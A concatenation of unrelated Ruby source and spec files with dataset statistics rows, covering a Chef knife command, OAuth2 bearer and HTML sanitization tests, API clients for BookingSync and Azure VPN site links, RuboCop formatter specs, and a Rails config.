banner "knife client key list CLIENT (options)"
deps do
require_relative "key_list"
end
attr_reader :actor
def initialize(argv = [])
super(argv)
@service_object = nil
end
def run
apply_params!(@name_args)
service_object.run
end
def list_method
:list_by_client
end
def actor_missing_error
"You must specify a client name"
end
def service_object
@service_object ||= Chef::Knife::KeyList.new(@actor, list_method, ui, config)
end
def apply_params!(params)
@actor = params[0]
if @actor.nil?
show_usage
ui.fatal(actor_missing_error)
exit 1
end
end
end
end
end
| 24.743243 | 85 | 0.656472 |
1ce3bb9ee8aa23c9882e63dd6309cabc6b6fc16d | 2,394 | require "rails_helper"
require "gds_api/test_helpers/content_store"
require "gds_api/test_helpers/router"
RSpec.describe DataHygiene::DocumentStatusChecker do
include GdsApi::TestHelpers::ContentStore
include GdsApi::TestHelpers::Router
let(:base_path) { "/base-path" }
describe "content-store status" do
subject { described_class.new(document).content_store? }
context "with a published live edition" do
let(:edition) { create(:live_edition, base_path: base_path) }
let(:document) { edition.document }
context "and there is no content item" do
before { stub_content_store_does_not_have_item(base_path) }
it { is_expected.to be false }
end
context "and there is an old content item" do
let(:content_item) do
content_item_for_base_path(base_path).merge(
"updated_at" => (edition.published_at - 1).iso8601,
)
end
before { stub_content_store_has_item(base_path, content_item) }
it { is_expected.to be false }
end
context "and there is a recent content item" do
let(:content_item) do
content_item_for_base_path(base_path).merge(
"updated_at" => (edition.published_at + 1).iso8601,
)
end
before { stub_content_store_has_item(base_path, content_item) }
it { is_expected.to be true }
end
end
end
describe "router status" do
subject { described_class.new(document).router? }
around do |example|
ClimateControl.modify ROUTER_API_BEARER_TOKEN: "token" do
example.run
end
end
context "with a published live edition" do
let(:edition) { create(:live_edition, base_path: base_path) }
let(:document) { edition.document }
context "and there is no content item" do
before { stub_router_doesnt_have_route(base_path) }
it { is_expected.to be false }
end
context "and there is a content item" do
before { stub_router_has_backend_route(base_path, backend_id: backend_id) }
context "with the same backend_id" do
let(:backend_id) { edition.rendering_app }
it { is_expected.to be true }
end
context "with a different backend_id" do
let(:backend_id) { "nothing" }
it { is_expected.to be false }
end
end
end
end
end
| 30.303797 | 83 | 0.652464 |
87a9a64904bcb68b3070e1f2a3a023f76483b25f | 241 | # frozen_string_literal: true
module Dynamodb
module Api
module Relation
class LimitClause # :nodoc:
attr_reader :number
def initialize(number)
@number = number
end
end
end
end
end
| 15.0625 | 33 | 0.605809 |
ff1d7c8965ea308cfffcccba44bf8c29acc91342 | 4,019 | require 'spec_helper.rb'
describe Rack::OAuth2::Server::Resource::Bearer do
let(:app) do
Rack::OAuth2::Server::Resource::Bearer.new(simple_app) do |request|
case request.access_token
when 'valid_token'
bearer_token
when 'insufficient_scope_token'
request.insufficient_scope!
else
request.invalid_token!
end
end
end
let(:bearer_token) do
Rack::OAuth2::AccessToken::Bearer.new(:access_token => 'valid_token')
end
let(:access_token) { env[Rack::OAuth2::Server::Resource::ACCESS_TOKEN] }
let(:request) { app.call(env) }
subject { app.call(env) }
shared_examples_for :authenticated_bearer_request do
it 'should be authenticated' do
status, header, response = request
status.should == 200
access_token.should == bearer_token
end
end
shared_examples_for :unauthorized_bearer_request do
it 'should be unauthorized' do
status, header, response = request
status.should == 401
header['WWW-Authenticate'].should include 'Bearer'
access_token.should be_nil
end
end
shared_examples_for :bad_bearer_request do
it 'should be bad_request' do
status, header, response = request
status.should == 400
access_token.should be_nil
end
end
shared_examples_for :skipped_authentication_request do
it 'should skip OAuth 2.0 authentication' do
status, header, response = request
status.should == 200
access_token.should be_nil
end
end
context 'when no access token is given' do
let(:env) { Rack::MockRequest.env_for('/protected_resource') }
it_behaves_like :skipped_authentication_request
end
context 'when valid_token is given' do
context 'when token is in Authorization header' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', 'HTTP_AUTHORIZATION' => 'Bearer valid_token') }
it_behaves_like :authenticated_bearer_request
end
context 'when token is in params' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', :params => {:access_token => 'valid_token'}) }
it_behaves_like :authenticated_bearer_request
end
end
context 'when invalid authorization header is given' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', 'HTTP_AUTHORIZATION' => '') }
it_behaves_like :skipped_authentication_request
end
context 'when invalid_token is given' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', 'HTTP_AUTHORIZATION' => 'Bearer invalid_token') }
context 'when token is in Authorization header' do
it_behaves_like :unauthorized_bearer_request
end
context 'when token is in params' do
let(:env) { Rack::MockRequest.env_for('/protected_resource', :params => {:access_token => 'invalid_token'}) }
it_behaves_like :unauthorized_bearer_request
end
describe 'realm' do
context 'when specified' do
let(:realm) { 'server.example.com' }
let(:app) do
Rack::OAuth2::Server::Resource::Bearer.new(simple_app, realm) do |request|
request.unauthorized!
end
end
it 'should use specified realm' do
status, header, response = request
header['WWW-Authenticate'].should include "Bearer realm=\"#{realm}\""
end
end
context 'otherwize' do
it 'should use default realm' do
status, header, response = request
header['WWW-Authenticate'].should include "Bearer realm=\"#{Rack::OAuth2::Server::Resource::Bearer::DEFAULT_REALM}\""
end
end
end
end
context 'when multiple access_token is given' do
context 'when token is in Authorization header and params' do
let(:env) do
Rack::MockRequest.env_for(
'/protected_resource',
'HTTP_AUTHORIZATION' => 'Bearer valid_token',
:params => {:access_token => 'valid_token'}
)
end
it_behaves_like :bad_bearer_request
end
end
end
| 32.41129 | 127 | 0.675292 |
ac49cd74c6e78258c5571302108ca64bdf84a09f | 2,723 | module BookingSync::API
class Client
module RatesRules
# List rates rules
#
# Returns rates rules for the account user is authenticated with.
# @param options [Hash] A customizable set of options.
# @option options [Array] fields: List of fields to be fetched.
# @return [Array<BookingSync::API::Resource>] Array of rates rules.
#
# @example Get the list of rates rules for the current account
# rates_rules = @api.rates_rules
# rates_rules.first.always_applied # => true
# @example Get the list of rates rules only with always_applied and kind for smaller response
# @api.rates_rules(fields: [:always_applied, :kind])
# @see http://docs.api.bookingsync.com/reference/endpoints/rates_rules/#list-rates-rules
def rates_rules(options = {}, &block)
paginate :rates_rules, options, &block
end
# Get a single rates_rule
#
# @param rates_rule [BookingSync::API::Resource|Integer] RatesRule or ID
# of the rates_rule.
# @param options [Hash] A customizable set of query options.
# @option options [Array] fields: List of fields to be fetched.
# @return [BookingSync::API::Resource]
def rates_rule(rates_rule, options = {})
get("rates_rules/#{rates_rule}", options).pop
end
# Create a new rates_rule
#
# @param rates_table [BookingSync::API::Resource|Integer] RatesTable or ID of
# the rates_table for which rates_rule will be created.
# @param options [Hash] RatesRule's attributes.
# @return [BookingSync::API::Resource] Newly created rates_rule.
def create_rates_rule(rates_table, options = {})
post("rates_tables/#{rates_table}/rates_rules", rates_rules: [options]).pop
end
# Edit a rates_rule
#
# @param rates_rule [BookingSync::API::Resource|Integer] RatesRule or ID of
# the rates_rule to be updated.
# @param options [Hash] RatesRule attributes to be updated.
# @return [BookingSync::API::Resource] Updated rates_rule on success,
# exception is raised otherwise.
# @example
# rates_rule = @api.rates_rules.first
# @api.edit_rates_rule(rates_rule, { percentage: 10 })
def edit_rates_rule(rates_rule, options = {})
put("rates_rules/#{rates_rule}", rates_rules: [options]).pop
end
# Delete a rates_rule
#
# @param rates_rule [BookingSync::API::Resource|Integer] RatesRule or ID
# of the rates_rule to be deleted.
# @return [NilClass] Returns nil on success.
def delete_rates_rule(rates_rule)
delete "rates_rules/#{rates_rule}"
end
end
end
end
| 40.641791 | 99 | 0.654425 |
4af705a2d0125213a0795bb335511a5a1fb12ef4 | 816 | # frozen_string_literal: true
require 'rails_helper'
describe Services::Payu::Signature do
let(:service) { described_class.new({}) }
describe '#call' do
let(:source) { double(:source) }
subject { service.call }
before do
allow(service).to receive(:bytesized_hash).and_return source
end
it 'should use MD5 for encoding' do
expect(HMAC::MD5).to receive_message_chain(:new, :update, :hexdigest) # receive(:hexdigest).with(source)
subject
end
end
describe '#bytesized_hash' do
let(:hash) do
{
amount: '1234',
testorder: 'FALSE'
}
end
let(:value) { '41234' }
subject { service.send(:bytesized_hash) }
before do
service.instance_variable_set(:@hash, hash)
end
it { is_expected.to eq value }
end
end
| 20.4 | 110 | 0.634804 |
ab3c59b12355f4ff1193aaf90a507b32fbcbaeaa | 4,754 | # frozen_string_literal: true
RSpec.describe RuboCop::Formatter::TapFormatter do
subject(:formatter) { described_class.new(output) }
let(:output) { StringIO.new }
let(:files) do
%w[lib/rubocop.rb spec/spec_helper.rb exe/rubocop].map do |path|
File.expand_path(path)
end
end
describe '#file_finished' do
before do
formatter.started(files)
formatter.file_started(files.first, {})
formatter.file_finished(files.first, offenses)
end
context 'when no offenses are detected' do
let(:offenses) { [] }
it 'prints "ok"' do
expect(output.string).to include('ok 1')
end
end
context 'when any offenses are detected' do
let(:offenses) do
source_buffer = Parser::Source::Buffer.new('test', 1)
source = Array.new(9) { |index| "This is line #{index + 1}." }
source_buffer.source = source.join("\n")
line_length = source[0].length + 1
[
RuboCop::Cop::Offense.new(
:convention,
Parser::Source::Range.new(source_buffer,
line_length + 2,
line_length + 3),
'foo',
'Cop'
)
]
end
it 'prints "not ok"' do
expect(output.string).to include('not ok 1')
end
end
end
describe '#finished' do
before { formatter.started(files) }
context 'when any offenses are detected' do
before do
source_buffer = Parser::Source::Buffer.new('test', 1)
source = Array.new(9) { |index| "This is line #{index + 1}." }
source_buffer.source = source.join("\n")
line_length = source[0].length + 1
formatter.file_started(files[0], {})
formatter.file_finished(
files[0],
[
RuboCop::Cop::Offense.new(
:convention,
Parser::Source::Range.new(source_buffer,
line_length + 2,
line_length + 3),
'foo',
'Cop'
)
]
)
formatter.file_started(files[1], {})
formatter.file_finished(files[1], [])
formatter.file_started(files[2], {})
formatter.file_finished(
files[2],
[
RuboCop::Cop::Offense.new(
:error,
Parser::Source::Range.new(source_buffer,
(4 * line_length) + 1,
(4 * line_length) + 2),
'bar',
'Cop'
),
RuboCop::Cop::Offense.new(
:convention,
Parser::Source::Range.new(source_buffer,
5 * line_length,
(5 * line_length) + 1),
'foo',
'Cop'
)
]
)
end
it 'reports all detected offenses for all failed files' do
formatter.finished(files)
expect(output.string).to include(<<~OUTPUT)
1..3
not ok 1 - lib/rubocop.rb
# lib/rubocop.rb:2:3: C: [Correctable] foo
# This is line 2.
# ^
ok 2 - spec/spec_helper.rb
not ok 3 - exe/rubocop
# exe/rubocop:5:2: E: [Correctable] bar
# This is line 5.
# ^
# exe/rubocop:6:1: C: [Correctable] foo
# This is line 6.
# ^
OUTPUT
end
end
context 'when no offenses are detected' do
before do
files.each do |file|
formatter.file_started(file, {})
formatter.file_finished(file, [])
end
end
it 'does not report offenses' do
formatter.finished(files)
expect(output.string).not_to include('not ok')
end
end
end
describe '#report_file', :config do
let(:cop_class) { RuboCop::Cop::Cop }
let(:output) { StringIO.new }
before { cop.send(:begin_investigation, processed_source) }
context 'when the source contains multibyte characters' do
let(:source) do
<<~RUBY
do_something("あああ", ["いいい"])
RUBY
end
it 'displays text containing the offending source line' do
location = source_range(source.index('[')..source.index(']'))
cop.add_offense(nil, location: location, message: 'message 1')
formatter.report_file('test', cop.offenses)
expect(output.string)
.to eq <<~OUTPUT
# test:1:21: C: message 1
# do_something("あああ", ["いいい"])
# ^^^^^^^^^^
OUTPUT
end
end
end
end
| 27.964706 | 70 | 0.500421 |
039ca36af6ea79f0a984d88ae27cd45badfd6a45 | 5,565 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Banzai::Filter::SanitizationFilter do
include FilterSpecHelper
it_behaves_like 'default allowlist'
describe 'custom allowlist' do
it_behaves_like 'XSS prevention'
it_behaves_like 'sanitize link'
it 'customizes the allowlist only once' do
instance = described_class.new('Foo')
control_count = instance.allowlist[:transformers].size
3.times { instance.allowlist }
expect(instance.allowlist[:transformers].size).to eq control_count
end
it 'customizes the allowlist only once for different instances' do
instance1 = described_class.new('Foo1')
instance2 = described_class.new('Foo2')
control_count = instance1.allowlist[:transformers].size
instance1.allowlist
instance2.allowlist
expect(instance1.allowlist[:transformers].size).to eq control_count
expect(instance2.allowlist[:transformers].size).to eq control_count
end
it 'sanitizes `class` attribute from all elements' do
act = %q(<pre class="code highlight white c"><code><span class="k">def</span></code></pre>)
exp = %q(<pre><code><span class="k">def</span></code></pre>)
expect(filter(act).to_html).to eq exp
end
it 'sanitizes `class` attribute from non-highlight spans' do
act = %q(<span class="k">def</span>)
expect(filter(act).to_html).to eq %q(<span>def</span>)
end
it 'allows `text-align` property in `style` attribute on table elements' do
html = <<~HTML
<table>
<tr><th style="text-align: center">Head</th></tr>
<tr><td style="text-align: right">Body</th></tr>
</table>
HTML
doc = filter(html)
expect(doc.at_css('th')['style']).to eq 'text-align: center'
expect(doc.at_css('td')['style']).to eq 'text-align: right'
end
it 'disallows other properties in `style` attribute on table elements' do
html = <<~HTML
<table>
<tr><th style="text-align: foo">Head</th></tr>
<tr><td style="position: fixed; height: 50px; width: 50px; background: red; z-index: 999; font-size: 36px; text-align: center">Body</th></tr>
</table>
HTML
doc = filter(html)
expect(doc.at_css('th')['style']).to be_nil
expect(doc.at_css('td')['style']).to eq 'text-align: center'
end
it 'disallows `text-align` property in `style` attribute on other elements' do
html = <<~HTML
<div style="text-align: center">Text</div>
HTML
doc = filter(html)
expect(doc.at_css('div')['style']).to be_nil
end
it 'allows `span` elements' do
exp = act = %q(<span>Hello</span>)
expect(filter(act).to_html).to eq exp
end
it 'allows `abbr` elements' do
exp = act = %q(<abbr title="HyperText Markup Language">HTML</abbr>)
expect(filter(act).to_html).to eq exp
end
it 'disallows the `name` attribute globally, allows on `a`' do
html = <<~HTML
<img name="getElementById" src="">
<span name="foo" class="bar">Hi</span>
<a name="foo" class="bar">Bye</a>
HTML
doc = filter(html)
expect(doc.at_css('img')).not_to have_attribute('name')
expect(doc.at_css('span')).not_to have_attribute('name')
expect(doc.at_css('a')).to have_attribute('name')
end
it 'allows `summary` elements' do
exp = act = '<summary>summary line</summary>'
expect(filter(act).to_html).to eq exp
end
it 'allows `details` elements' do
exp = act = '<details>long text goes here</details>'
expect(filter(act).to_html).to eq exp
end
it 'allows `rel=license` in links' do
exp = act = '<a rel="license" href="http://example.com">rel-license</a>'
expect(filter(act).to_html).to eq exp
end
it 'allows `data-math-style` attribute on `code` and `pre` elements' do
html = <<-HTML
<pre class="code" data-math-style="inline">something</pre>
<code class="code" data-math-style="inline">something</code>
<div class="code" data-math-style="inline">something</div>
HTML
output = <<-HTML
<pre data-math-style="inline">something</pre>
<code data-math-style="inline">something</code>
<div>something</div>
HTML
expect(filter(html).to_html).to eq(output)
end
it 'allows the `data-sourcepos` attribute globally' do
exp = %q(<p data-sourcepos="1:1-1:10">foo/bar.md</p>)
act = filter(exp)
expect(act.to_html).to eq exp
end
describe 'footnotes' do
it 'allows correct footnote id property on links' do
exp = %q(<a href="#fn-first" id="fnref-first">foo/bar.md</a>)
act = filter(exp)
expect(act.to_html).to eq exp
end
it 'allows correct footnote id property on li element' do
exp = %q(<ol><li id="fn-last">footnote</li></ol>)
act = filter(exp)
expect(act.to_html).to eq exp
end
it 'removes invalid id for footnote links' do
exp = %q(<a href="#fn1">link</a>)
%w[fnrefx test xfnref-1].each do |id|
act = filter(%(<a href="#fn1" id="#{id}">link</a>))
expect(act.to_html).to eq exp
end
end
it 'removes invalid id for footnote li' do
exp = %q(<ol><li>footnote</li></ol>)
%w[fnx test xfn-1].each do |id|
act = filter(%(<ol><li id="#{id}">footnote</li></ol>))
expect(act.to_html).to eq exp
end
end
end
end
end
| 30.409836 | 151 | 0.610782 |
f7bffedcd4c54021b9f9b9feaea83e94a17fd02e | 979 | module VHP
module YMLHelper
# Load YML the way we expect: symbolized names,
# even if they specified symbols or not
def load_yml_the_vhp_way(f)
YAML.load(File.read(f), symbolize_names: true)
end
# Expected: a cve_yml hash, key of commits
# Returns: every commit sha in the fixes hash
#
# e.g. when the YML has
# fixes:
# - commit: abc
# note:
# - commit:
# note:
# extract_shas_from_commitlist(h, :fixes) => ['abc']
def extract_shas_from_commitlist(h, key)
unless h.key? key
warn "ERROR Malformed CVE YML? #{h[:CVE]} should have a `fixes` key. Skipping. Hash: #{h}"
return []
end
begin
shs = h[key].inject([]) do |memo, fix|
memo << fix[:commit] unless fix[:commit].to_s.strip.empty?
memo
end
rescue => e
warn "ERROR extracting YML info for #{h[:CVE]}: #{e.message}"
return []
end
end
end
end
| 26.459459 | 98 | 0.572012 |
014e57b7a3c8cba42f63a210b411f1d005b042bd | 243 | # frozen_string_literal: true
module Spring
module Commands
class Coach
def env(*)
"development"
end
def exec_name
"coach"
end
Spring.register_command "coach", Coach.new
end
end
end
| 13.5 | 48 | 0.596708 |
1d80735733dbb0c8ad2b715121c208b96d280afe | 14,639 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2020_04_01
#
# VpnSiteLinks
#
class VpnSiteLinks
include MsRestAzure
#
# Creates and initializes a new instance of the VpnSiteLinks class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [NetworkManagementClient] reference to the NetworkManagementClient
attr_reader :client
#
# Retrieves the details of a VPN site link.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param vpn_site_link_name [String] The name of the VpnSiteLink being
# retrieved.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [VpnSiteLink] operation results.
#
def get(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:nil)
response = get_async(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Retrieves the details of a VPN site link.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param vpn_site_link_name [String] The name of the VpnSiteLink being
# retrieved.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:nil)
get_async(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:custom_headers).value!
end
#
# Retrieves the details of a VPN site link.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param vpn_site_link_name [String] The name of the VpnSiteLink being
# retrieved.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, vpn_site_name, vpn_site_link_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'vpn_site_name is nil' if vpn_site_name.nil?
fail ArgumentError, 'vpn_site_link_name is nil' if vpn_site_link_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnSites/{vpnSiteName}/vpnSiteLinks/{vpnSiteLinkName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'vpnSiteName' => vpn_site_name,'vpnSiteLinkName' => vpn_site_link_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2020_04_01::Models::VpnSiteLink.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<VpnSiteLink>] operation results.
#
def list_by_vpn_site(resource_group_name, vpn_site_name, custom_headers:nil)
first_page = list_by_vpn_site_as_lazy(resource_group_name, vpn_site_name, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_vpn_site_with_http_info(resource_group_name, vpn_site_name, custom_headers:nil)
list_by_vpn_site_async(resource_group_name, vpn_site_name, custom_headers:custom_headers).value!
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_vpn_site_async(resource_group_name, vpn_site_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'vpn_site_name is nil' if vpn_site_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnSites/{vpnSiteName}/vpnSiteLinks'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'vpnSiteName' => vpn_site_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2020_04_01::Models::ListVpnSiteLinksResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ListVpnSiteLinksResult] operation results.
#
def list_by_vpn_site_next(next_page_link, custom_headers:nil)
response = list_by_vpn_site_next_async(next_page_link, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_vpn_site_next_with_http_info(next_page_link, custom_headers:nil)
list_by_vpn_site_next_async(next_page_link, custom_headers:custom_headers).value!
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param next_page_link [String] The NextLink from the previous successful call
# to List operation.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_vpn_site_next_async(next_page_link, custom_headers:nil)
fail ArgumentError, 'next_page_link is nil' if next_page_link.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = '{nextLink}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
skip_encoding_path_params: {'nextLink' => next_page_link},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Network::Mgmt::V2020_04_01::Models::ListVpnSiteLinksResult.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Lists all the vpnSiteLinks in a resource group for a vpn site.
#
# @param resource_group_name [String] The resource group name of the VpnSite.
# @param vpn_site_name [String] The name of the VpnSite.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ListVpnSiteLinksResult] which provide lazy access to pages of the
# response.
#
def list_by_vpn_site_as_lazy(resource_group_name, vpn_site_name, custom_headers:nil)
response = list_by_vpn_site_async(resource_group_name, vpn_site_name, custom_headers:custom_headers).value!
unless response.nil?
page = response.body
page.next_method = Proc.new do |next_page_link|
list_by_vpn_site_next_async(next_page_link, custom_headers:custom_headers)
end
page
end
end
end
end
| 43.960961 | 183 | 0.702234 |
185d8b5a891911551428cda28c250ece95e6b507 | 2,686 | require File.expand_path('../boot', __FILE__)
# Pick the frameworks you want:
require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "active_resource/railtie"
require "sprockets/railtie"
# require "rails/test_unit/railtie"
if defined?(Bundler)
# If you precompile assets before deploying to production, use this line
Bundler.require(*Rails.groups(:assets => %w(development test)))
# If you want your assets lazily compiled in production, use this line
# Bundler.require(:default, :assets, Rails.env)
end
module Rabel
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
config.autoload_paths += %W(#{config.root}/lib)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
config.time_zone = 'Beijing'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
config.i18n.load_path += Dir[Rails.root.join('config', 'locales', '**', '*.yml')]
config.i18n.default_locale = :zh
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password, :password_confirmation]
# Enable the asset pipeline
config.assets.enabled = true
# Version of your assets, change this if you want to expire all your assets
config.assets.version = '1.0'
config.assets.paths += %W(#{config.root}/themes/images #{config.root}/themes/stylesheets #{config.root}/themes/javascripts)
# Enable whitelist mass assignment protection by default
config.active_record.whitelist_attributes = true
# Don't access the DB when precompiling the assets
config.assets.initialize_on_precompile = false
end
end
| 41.96875 | 127 | 0.733805 |
ed9864b60ab546cad7e2710125705e279d81e501 | 4,943 | # ==========================================
# CMock Project - Automatic Mock Generation for C
# Copyright (c) 2007 Mike Karlesky, Mark VanderVoord, Greg Williams
# [Released under MIT License. Please refer to license.txt for details]
# ==========================================
class CMockConfig
CMockDefaultOptions =
{
:framework => :unity,
:mock_path => 'mocks',
:mock_prefix => 'Mock',
:plugins => [],
:strippables => ['(?:__attribute__\s*\(+.*?\)+)'],
:attributes => ['__ramfunc', '__irq', '__fiq', 'register', 'extern'],
:c_calling_conventions => ['__stdcall', '__cdecl', '__fastcall'],
:enforce_strict_ordering => false,
:unity_helper_path => false,
:treat_as => {},
:treat_as_void => [],
